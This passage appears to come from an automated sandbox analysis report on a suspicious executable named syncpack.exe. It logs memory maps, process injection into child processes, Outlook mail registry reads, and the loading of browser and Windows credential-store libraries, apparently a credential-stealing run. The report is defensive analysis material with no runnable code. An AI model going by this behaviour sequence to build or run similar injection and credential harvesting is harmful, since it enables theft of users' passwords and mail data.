pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False -
private_0x0000000000240000 0x00240000 0x00243fff Private Memory Readable, Writable True False False -
private_0x0000000000250000 0x00250000 0x00267fff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x002effff Private Memory Readable, Writable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x003cefff Pagefile Backed Memory Readable True False False -
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000420000 0x00420000 0x0042ffff Private Memory - True False False -
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x0000000000440000 0x00440000 0x0044ffff Private Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0046ffff Private Memory Readable, Writable True False False -
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory - True False False -
private_0x0000000000480000 0x00480000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004affff Private Memory Readable, Writable True False False -
private_0x00000000004b0000 0x004b0000 0x004bffff Private Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True False False -
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004e0000 0x004e0000 0x004effff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x005effff Private Memory Readable, Writable True False False -
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d10000 0x01d10000 0x01e9ffff Private Memory Readable, Writable True False False -
private_0x0000000001d10000 0x01d10000 0x01d1ffff Private Memory Readable, Writable True False False -
private_0x0000000001d20000 0x01d20000 0x01d9ffff Private Memory Readable, Writable True False False -
private_0x0000000001da0000 0x01da0000 0x01ddffff Private Memory Readable, Writable True False False -
private_0x0000000001de0000 0x01de0000 0x01deffff Private Memory Readable, Writable True False False -
private_0x0000000001df0000 0x01df0000 0x01e2ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001e30000 0x01e30000 0x01e30fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e40000 0x01e40000 0x01e40fff Private Memory Readable, Writable True False False -
pagefile_0x0000000001e50000 0x01e50000 0x01e50fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000001e60000 0x01e60000 0x01e62fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e70000 0x01e70000 0x01e70fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e80000 0x01e80000 0x01e80fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e90000 0x01e90000 0x01e9ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01fdffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01f5ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001ea0000 0x01ea0000 0x01ea2fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001eb0000 0x01eb0000 0x01ebffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f5ffff Private Memory Readable, Writable True False False -
private_0x0000000001f60000 0x01f60000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x01fdffff Private Memory Readable, Writable True False False -
private_0x0000000002020000 0x02020000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000002060000 0x02060000 0x0224ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002060000 0x02060000 0x0215ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000021b0000 0x021b0000 0x0224ffff Private Memory Readable, Writable True False False -
private_0x0000000002250000 0x02250000 0x0244ffff Private Memory Readable, Writable True False False -
private_0x0000000002250000 0x02250000 0x0234ffff Private Memory Readable, Writable True False False -
private_0x0000000002350000 0x02350000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x0000000002390000 0x02390000 0x023cffff Private Memory Readable, Writable True False False -
private_0x00000000023d0000 0x023d0000 0x0240ffff Private Memory Readable, Writable True False False -
private_0x0000000002410000 0x02410000 0x0244ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02450000 0x0271efff Memory Mapped File Readable False False False -
office.odf 0x02720000 0x02959fff Memory Mapped File Readable False False False -
pagefile_0x0000000002960000 0x02960000 0x02d5ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02e60fff Private Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02d9ffff Private Memory Readable, Writable True False False -
private_0x0000000002e50000 0x02e50000 0x02e8ffff Private Memory Readable, Writable True False False -
private_0x0000000002e90000 0x02e90000 0x02f8ffff Private Memory Readable, Writable True False False -
private_0x0000000004290000 0x04290000 0x0438ffff Private Memory Readable, Writable True False False -
private_0x0000000004390000 0x04390000 0x0448ffff Private Memory Readable, Writable True False False -
private_0x0000000004490000 0x04490000 0x0458ffff Private Memory Readable, Writable True False False -
private_0x0000000004590000 0x04590000 0x0468ffff Private Memory Readable, Writable True False False -
mspst32.dll 0x6fb80000 0x6fc8cfff Memory Mapped File Readable, Writable, Executable False False False -
contab32.dll 0x6fc90000 0x6fcb0fff Memory Mapped File Readable, Writable, Executable False False False -
sfc_os.dll 0x6fcc0000 0x6fcccfff Memory Mapped File Readable, Writable, Executable False False False -
sfc.dll 0x6fcf0000 0x6fcf2fff Memory Mapped File Readable, Writable, Executable False False False -
mapir.dll 0x6fd00000 0x6fe30fff Memory Mapped File Readable, Writable, Executable False False False -
olmapi32.dll 0x6feb0000 0x70181fff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x71490000 0x724a7fff Memory Mapped File Readable, Writable, Executable False False False -
riched20.dll 0x744d0000 0x745d8fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
msi.dll 0x74a70000 0x74caffff Memory Mapped File Readable, Writable, Executable False False False -
msvcr80.dll 0x74cb0000 0x74d4afff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x400000, size = 102400 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c os_tid = 0x608, address = 0x0 True 1
Fn
Threads
Thread 0x608
47 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-25 14:54:23 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75fc4f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75fc359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75fc1252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75fc4208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75fc4d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x7604410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76044195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x75fcd31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75fdee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77c2441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c4c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77c4c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75fdf088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77c305d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77c4ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77c00b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77cbfde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77c51e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76044761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x7603cd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7604424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x760446b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76056676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76044751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x760565f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x760447c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x760447e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x760447f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75fdeee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook, value_name = DLLPathEx, data = 67 True 1
Fn
Module Load module_name = C:\PROGRA~2\MICROS~1\Office12\OLMAPI32.DLL, base_address = 0x6feb0000 True 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp, desired_access = FILE_APPEND_DATA True 1
Fn
COM Create interface = 9240A6CD-AF41-11D2-8C3B-00104B2A6676, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp, size = 50 True 1
Fn
Data
Module Get Handle module_name = mscoree.dll False 1
Fn
Process #11: syncpack.exe
405 0
»
Information Value
ID #11
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
»
Information Value
PID 0x728
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 730
0x 7D4
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00210fff Pagefile Backed Memory Readable, Writable True False False -
rsaenh.dll 0x00220000 0x0025bfff Memory Mapped File Readable False False False -
private_0x0000000000220000 0x00220000 0x0025ffff Private Memory Readable, Writable True False False -
tzres.dll 0x00260000 0x00260fff Memory Mapped File Readable False False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00268fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00276fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00291fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00328fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0045afff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x0065ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000660000 0x00660000 0x007e7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007f0000 0x007f0000 0x00970fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000980000 0x00980000 0x01d7ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d80000 0x01d80000 0x01e7ffff Private Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f2ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01f30000 0x021fefff Memory Mapped File Readable False False False -
private_0x0000000002200000 0x02200000 0x02300fff Private Memory Readable, Writable True False False -
nss3.dll 0x02200000 0x023b1fff Memory Mapped File Readable False False False -
private_0x0000000002200000 0x02200000 0x0236ffff Private Memory Readable, Writable True False False -
private_0x0000000002200000 0x02200000 0x022fffff Private Memory Readable, Writable True False False -
private_0x0000000002330000 0x02330000 0x0236ffff Private Memory Readable, Writable True False False -
private_0x0000000002370000 0x02370000 0x0246ffff Private Memory Readable, Writable True False False -
private_0x0000000002470000 0x02470000 0x0256ffff Private Memory Readable, Writable True False False -
private_0x0000000002500000 0x02500000 0x025fffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002600000 0x02600000 0x029f2fff Pagefile Backed Memory Readable True False False -
msvcp100.dll 0x6fe00000 0x6fe68fff Memory Mapped File Readable, Writable, Executable False False False -
atl.dll 0x6fe40000 0x6fe53fff Memory Mapped File Readable, Writable, Executable False False False -
pstorec.dll 0x6fe60000 0x6fe6cfff Memory Mapped File Readable, Writable, Executable False False False -
mozglue.dll 0x6fec0000 0x6fee1fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x6fef0000 0x6ffadfff Memory Mapped File Readable, Writable, Executable False False False -
wsock32.dll 0x6ffb0000 0x6ffb6fff Memory Mapped File Readable, Writable, Executable False False False -
nss3.dll 0x6ffc0000 0x70174fff Memory Mapped File Readable, Writable, Executable False False False -
vaultcli.dll 0x70180000 0x7018bfff Memory Mapped File Readable, Writable, Executable False False False -
winmm.dll 0x70250000 0x70281fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
softokn3.dll 0x74690000 0x746b6fff Memory Mapped File Readable, Writable, Executable False False False -
freebl3.dll 0x74a30000 0x74a7efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x75020000 0x750a3fff Memory Mapped File Readable, Writable, Executable False False False -
nssdbm3.dll 0x750d0000 0x750e6fff Memory Mapped File Readable, Writable, Executable False False False -
freebl3.dll 0x755d0000 0x7561efff Memory Mapped File Readable, Writable, Executable False False False -
nssdbm3.dll 0x755d0000 0x755e6fff Memory Mapped File Readable, Writable, Executable False False False -
softokn3.dll 0x755f0000 0x75616fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75f30000 0x75faafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x400000, size = 372736 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x868 os_tid = 0x730, address = 0x0 True 1
Fn
Threads
Thread 0x730
342 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Module Load module_name = comctl32.dll, base_address = 0x75020000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitCommonControlsEx, address_out = 0x75026be6 True 1
Fn
Module Load module_name = shell32.dll, base_address = 0x76480000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x764a0468 True 1
Fn
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_lng.ini, type = file_attributes False 1
Fn
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 18
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = ShowInfoTip, default_value = 1 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Ini Read file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.cfg, section_name = General, key_name = ShowTimeInGMT, default_value = 0 True 1
Fn
